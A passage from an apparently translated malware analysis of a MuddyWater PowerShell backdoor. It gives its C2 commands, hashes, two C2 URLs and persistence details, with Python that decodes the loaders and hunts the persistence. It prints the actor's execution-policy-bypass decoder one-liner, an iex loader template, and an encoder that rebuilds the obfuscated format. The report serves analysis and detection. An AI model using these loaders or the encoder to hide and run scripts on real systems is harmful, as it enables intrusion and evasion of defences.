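        raise ValueError(f"base64 literal is not raw DEFLATE: {exc}") from None
    return inner.decode("ascii")           # [Text.Encoding]::ASCII in the original


def peel_stages(ps_text: str, limit: int = 16) -> list:
    """Keep inflating while the output is itself another such loader.
    Returns every layer, outermost first; `limit` guards against a stage that
    keeps re-emitting loaders."""
    layers = [ps_text]
    while len(layers) <= limit:
        try:
            layers.append(inflate_stage(layers[-1]))
        except ValueError:
            break
    return layers


def wrap_stage(inner: str) -> str:
    """Build a loader in the same shape as the page's one-liner (constructed fixture)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = comp.compress(inner.encode("ascii")) + comp.flush()
    b64 = base64.b64encode(raw).decode("ascii")
    return ("iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream "
            "($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('" + b64 + "')))), "
            "[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")


# Constructed three-layer sample: a final script wrapped twice.
FINAL_SCRIPT = "Write-Host 'constructed final stage'"
SAMPLE_LOADER = wrap_stage(wrap_stage(FINAL_SCRIPT))

if __name__ == "__main__":
    for depth, layer in enumerate(peel_stages(SAMPLE_LOADER)):
        print(f"layer {depth}: {layer[:72]}...")
```

For a real OneDrive.ini, pass the text produced by the custom base-52 decoder (the output of the `iex([String]::Join('',$d))` stage) as `ps_text`; if the last layer still contains obfuscated PowerShell rather than a loader, that is where manual de-obfuscation starts.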
Backdoor functionality
Once running, the script sets up autostart, decrypts the C2 addresses, creates a scheduled task and collects computer information; it then polls the C2 continuously, waiting for and executing commands.
Script entry point
(Disabling Office security settings)
(Autostart and scheduled task)
(Collecting computer information)
(MD5 of the computer information used as the key)
(Decrypting the C2)
HTTP POST
(POST body)
(Requesting commands from the server)
Because the server returned abnormal data, the remaining functionality could only be analysed by reading the source.
(Abnormal data returned by the server)
Command word upload: despite the name, this downloads a file.
Command word cmd: executes a cmd command.
Command word b64: executes a base64-encoded PowerShell script.
Command word muddy: downloads a PowerShell script to the file c:\programdata\LSASS, then executes the script stored in that file.

The base64 string in the accompanying figure decodes to "-exec Bypass -c $s=(get-content c:\programdata\LSASS);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));"
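This is the same decoder one-liner that OneDrive.dll runs against OneDrive.ini, so one re-implementation covers both the initial stage and the muddy command's LSASS drop. The Python below is an added example (not the actor's code or Tencent's) that mirrors the PowerShell loop statement for statement and adds the inverse encoder, which makes a quirk of the scheme visible: PowerShell's [Int32] cast on a double rounds half-to-even rather than truncating, so the encoding only round-trips 7-bit text, which is all a PowerShell script needs. The sample input is constructed.

```python
"""Decoder and encoder for the custom text encoding of OneDrive.ini and the
'muddy' command's C:\\ProgramData\\LSASS drop. Added example, not the actor's code."""


def decode_custom52(text: str) -> str:
    """Mirror the PowerShell loop character for character.

    Every character is a base-52 digit (char code minus 40); each group of three
    digits forms a value that is split into bytes by repeated `% 256` / `/ 256`,
    zero bytes are dropped, and the collected list is reversed before `iex`.
    """
    d = []          # $d
    v = 0           # $v
    for c, ch in enumerate(text):          # $c walks the string
        v = v * 52 + (ord(ch) - 40)
        if (c + 1) % 3 == 0:
            while v != 0:
                vv = v % 256
                if vv > 0:
                    d.append(chr(vv))
                # [Int32]($v/256) is a double-to-int cast, which in PowerShell
                # rounds half-to-even rather than truncating; Python's round()
                # behaves the same, so the two implementations stay in lockstep.
                v = round(v / 256)
    d.reverse()     # [array]::Reverse($d)
    return "".join(d)


def encode_custom52(script: str) -> str:
    """Inverse of decode_custom52 for 7-bit text.

    Two bytes are packed per three-character group as lo + 256*hi (the decoder
    emits lo first). Because of the rounding above, a lo byte >= 0x80 would
    bleed into hi, and a NUL would be dropped, so both are rejected.
    """
    data = script.encode("ascii")[::-1]    # the decoder reverses at the end
    if not all(1 <= b < 0x80 for b in data):
        raise ValueError("only NUL-free 7-bit text survives this encoding")
    groups = []
    for i in range(0, len(data), 2):
        lo = data[i]
        hi = data[i + 1] if i + 1 < len(data) else 0
        v = lo + 256 * hi                  # < 52**3, so three digits suffice
        digits = (v // (52 * 52), (v // 52) % 52, v % 52)
        groups.append("".join(chr(40 + x) for x in digits))
    return "".join(groups)


# Constructed stand-in for OneDrive.ini: any one-line PowerShell will do here.
SAMPLE_SCRIPT = "Write-Host 'constructed stage'"
SAMPLE_INI = encode_custom52(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print("encoded:", SAMPLE_INI)
    print("decoded:", decode_custom52(SAMPLE_INI))
```

To recover a real stage, read the dropped file as one string (the PowerShell relies on get-content returning a single line) and pass it to decode_custom52; the result is what iex would have run.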
0x4 Summary
Judging by MuddyWater's recent activity, the group has consistently favoured the combination of macro documents and PowerShell scripts. This sample shows the group still compromising large numbers of websites, using them both to deliver decoys and to collect the spoils, while pushing the truly core functionality down from the cloud so as to conceal its intent. We therefore remind government, enterprise and other users not to open documents of unknown origin and to install security software; when security software warns that an unfamiliar program is creating an autostart entry, take the warning seriously.
Tencent's Yujie Advanced Threat Detection System can already detect and block the connections made by this campaign. Yujie is a threat-intelligence and malware-detection system built on the capabilities of Tencent's anti-virus laboratory and on Tencent's large volume of cloud- and endpoint-side data.
With behaviour-based protection and intelligent models as its two core capabilities, Yujie can detect unknown threats efficiently and, by analysing network traffic at the boundary between the enterprise's internal and external networks, spot exploitation and attacks. Deploying it lets an enterprise notice malicious traffic promptly and see which phishing URLs and C2 server addresses are being accessed from its network.
0x5 IOCs
MD5:
5a42a712e3b3cfa1db32d9e3d832f8f1(doc)
6f1e84905f8d15269892026c0ab8d9a7(OneDrive.dll)
5a5b32e1ea053d5f76065cabe7e46851(OneDrive.html)
b96a0a71566a766589ba3c891f86ca3f(OneDrive.ini)
C2:
http://ektamservis.com/includes/main.php
http://www.cankayasrc.com/style/js/main.php
Autostart entries and scheduled task:
HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run : OneDrives (autostart)
HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run : OneDrives (autostart)
"c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\OneDrive.html,OneDrive,1" (autostart command)
MicrosoftOneDrive (scheduled task)
"c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\OneDrive.html,Defender,1," (scheduled task command)
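The advpack.dll,LaunchINFSection persistence above is unusual enough to hunt for directly: a legitimate use points rundll32 at a real .inf under a system directory, whereas this sample points it at an INF disguised as OneDrive.html under C:\ProgramData. The Python below is an added example (not Tencent's or the actor's code) that triages a list of autostart entries for that pattern and reports the INF section name so the file can be pulled for analysis. The entries are constructed from the IOCs on this page plus two benign-looking ones, not real telemetry, and the field names are assumptions.

```python
"""Triage autostart entries for rundll32 advpack.dll,LaunchINFSection persistence.
Added example; the entries below are constructed from this page's IOCs plus two
benign-looking ones, not real telemetry, and the field names are assumed."""
import re

LAUNCHINF_RE = re.compile(
    r"rundll32(?:\.exe)?\s+advpack(?:\.dll)?\s*,\s*LaunchINFSection\s+"
    r"(?P<file>[^,]+?)\s*,\s*(?P<section>[^,]*)",
    re.IGNORECASE,
)
# Locations a standard user can write to; a real driver/setup INF does not live here.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "%programdata%", "%appdata%", "%temp%")
# Names the sample used for its Run-key value and scheduled task (from the IOC list).
IOC_NAMES = {"onedrives", "microsoftonedrive"}


def assess(entry: dict):
    """entry: {'source': ..., 'name': ..., 'command': ...}. Returns a finding or None."""
    m = LAUNCHINF_RE.search(entry["command"])
    if m is None:
        return None
    inf_path = m.group("file").strip().strip('"')
    section = m.group("section").strip()
    reasons = []
    if not inf_path.lower().endswith(".inf"):
        reasons.append(f"INF hidden behind a non-.inf name (.{inf_path.rsplit('.', 1)[-1]})")
    if inf_path.lower().startswith(USER_WRITABLE):
        reasons.append("INF stored in a user-writable directory")
    if entry["name"].lower() in IOC_NAMES:
        reasons.append("autostart name matches a reported MuddyWater IOC")
    return {
        "source": entry["source"],
        "name": entry["name"],
        "inf": inf_path,
        "section": section,           # the [section] to pull from the INF for analysis
        "severity": "high" if reasons else "review",
        "reasons": reasons or ["LaunchINFSection autostart is rare; confirm manually"],
    }


def triage(entries):
    """Run assess over every entry and return only the findings, worst first."""
    findings = [f for f in map(assess, entries) if f]
    findings.sort(key=lambda f: (f["severity"] != "high", f["name"]))
    return findings


SAMPLE_ENTRIES = [
    {"source": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "name": "OneDrives",
     "command": r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\OneDrive.html,OneDrive,1,"},
    {"source": "Scheduled task", "name": "MicrosoftOneDrive",
     "command": r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\OneDrive.html,Defender,1,"},
    {"source": "Scheduled task", "name": "OemDriverSetup",   # constructed, benign-looking
     "command": r"rundll32.exe advpack.dll,LaunchINFSection C:\Windows\INF\oem7.inf,DefaultInstall,1"},
    {"source": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "name": "SecurityHealth",
     "command": r"C:\Windows\System32\SecurityHealthSystray.exe"},   # constructed, no LaunchINFSection
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ENTRIES):
        print(f"[{f['severity']}] {f['source']} :: {f['name']} -> {f['inf']} [{f['section']}]")
        for r in f["reasons"]:
            print("    -", r)
```

In practice the entries come from the Run/RunOnce keys under HKCU and HKLM and from the actions of every scheduled task; anything that scores "high" should have the INF retrieved and the named section inspected, since, as on this page, the same INF can carry several sections (OneDrive and Defender here) for different launch points.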
The MuddyWater APT group conducts cyber-espionage; its victims are mainly in Middle-Eastern countries such as Pakistan, Saudi Arabia, the UAE, Iraq and Turkey.
Since it was exposed in November 2017, MuddyWater has frequently launched attacks using PowerShell scripts as its backdoor, with its main targets in government, finance, energy, telecommunications and other critical sectors.
Related reading: "Summary of recent attack activity by the MuddyWater APT group"
